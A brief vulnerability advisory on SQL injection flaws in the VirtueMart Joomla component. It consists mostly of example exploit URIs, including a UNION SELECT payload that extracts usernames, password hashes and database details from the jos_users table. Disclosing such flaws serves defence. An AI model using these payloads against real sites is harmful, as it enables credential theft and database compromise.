VirtueMart Multiple SQL Injection Vulnerabilities

VirtueMart Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart
http://www.example.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart
http://www.example.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version